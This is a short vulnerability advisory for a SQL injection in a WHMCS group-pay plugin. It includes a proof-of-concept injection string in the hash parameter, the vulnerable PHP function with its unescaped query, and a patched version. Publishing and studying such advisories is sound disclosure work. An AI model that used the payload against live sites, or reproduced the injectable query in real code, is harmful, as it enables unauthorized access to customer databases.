61 lines
No EOL
1.7 KiB
Text
Executable file
61 lines
No EOL
1.7 KiB
Text
Executable file
#######################################################################
|
|
|
|
Tile: WHMCS grouppay plugin SQL Injection <= 1.5
|
|
Author: HJauditing Employee Tim
|
|
E-mail: Tim@HJauditing.com
|
|
Web: http://hjauditing.com/
|
|
Plugin: http://kadeo.com.au/design-and-development/whmcs-dev/whmcs-modules/72-group-pay.html
|
|
|
|
#######################################################################
|
|
|
|
============
|
|
Introduction
|
|
============
|
|
|
|
We have found a SQL injection inside the group pay plugin for WHCMS.
|
|
A lot of game hosting companies are using this plugin.
|
|
SQL Injection is in the function gp_LoadUserFromHash.
|
|
|
|
============
|
|
Exploits
|
|
============
|
|
|
|
- SQL Injection
|
|
grouppay.php?hash=%hash%' and '1'='1
|
|
|
|
============
|
|
Code SQL Injection
|
|
============
|
|
|
|
/modules/addons/group_pay/functions_hash.php
|
|
function gp_LoadUserFromHash($hash) {
|
|
//Kill the Dashes
|
|
$hash = str_replace ( "-", "", $hash );
|
|
$result = mysql_query ( "SELECT `id` from tblclients where md5(CONCAT(id,email)) = '$hash'" );
|
|
if($result){
|
|
$row = mysql_fetch_row ( $result );
|
|
return $row [0];
|
|
}else{
|
|
return false;
|
|
}
|
|
}
|
|
|
|
============
|
|
Fix
|
|
============
|
|
|
|
/modules/addons/group_pay/functions_hash.php
|
|
function gp_LoadUserFromHash($hash) {
|
|
//Kill the Dashes
|
|
$hash = str_replace ( "-", "", $hash );
|
|
$hash = mysql_real_escape_string($hash);
|
|
$result = mysql_query ( "SELECT `id` from tblclients where md5(CONCAT(id,email)) = '$hash'" );
|
|
if($result){
|
|
$row = mysql_fetch_row ( $result );
|
|
return $row [0];
|
|
}else{
|
|
return false;
|
|
}
|
|
}
|
|
|
|
#######################################################################? |